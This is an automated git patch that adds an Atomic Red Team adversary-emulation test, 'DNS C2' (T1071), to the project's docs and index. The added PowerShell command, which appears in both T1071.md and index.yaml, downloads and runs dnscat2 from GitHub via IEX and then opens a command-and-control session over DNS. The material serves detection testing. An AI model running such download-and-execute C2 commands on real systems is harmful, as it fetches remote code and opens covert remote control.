From 19560b02c8d218bbd064d233c6d0d93f736c42fe Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 6 Feb 2020 16:00:58 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1071/T1071.md | 32 ++++++++++++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 24 ++++++++++++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 58 insertions(+) diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index 1e3757e1..de7795ce 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -18,6 +18,8 @@ For connections that occur internally within an enclave (such as those between a - [Atomic Test #6 - DNS Long Domain Query](#atomic-test-6---dns-long-domain-query) +- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2) +
@@ -195,4 +197,34 @@ Set-Location $PathToAtomicsFolder +
+
+ +## Atomic Test #7 - DNS C2 +This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. +The following blogs have more information. +https://github.com/iagox86/dnscat2 +https://github.com/lukebaggett/dnscat2-powershell + +**Supported Platforms:** Windows + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| +| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| + + +#### Attack Commands: Run with `powershell`! +``` +IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') +Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} +``` + + + + + +
diff --git a/atomics/index.md b/atomics/index.md index 8bcc00f2..3942f639 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -983,6 +983,7 @@ - Atomic Test #4: DNS Large Query Volume [windows] - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] + - Atomic Test #7: DNS C2 [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index ff22d907..bdd003c0 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -27955,6 +27955,30 @@ command-and-control: command: | Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} + - name: DNS C2 + description: | + This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. + The following blogs have more information. + https://github.com/iagox86/dnscat2 + https://github.com/lukebaggett/dnscat2-powershell + supported_platforms: + - windows + input_arguments: + domain: + description: Domain Name configured to use DNS Server where your C2 listener + is running + type: string + default: example.com + server_ip: + description: IP address of DNS server where your C2 listener is running + type: string + default: 127.0.0.1 + executor: + name: powershell + elevation_required: false + command: |- + IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') + Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} T1032: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a26ff144..5b957c85 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -730,6 +730,7 @@ - Atomic Test #4: DNS Large Query Volume [windows] - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] + - Atomic Test #7: DNS C2 [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)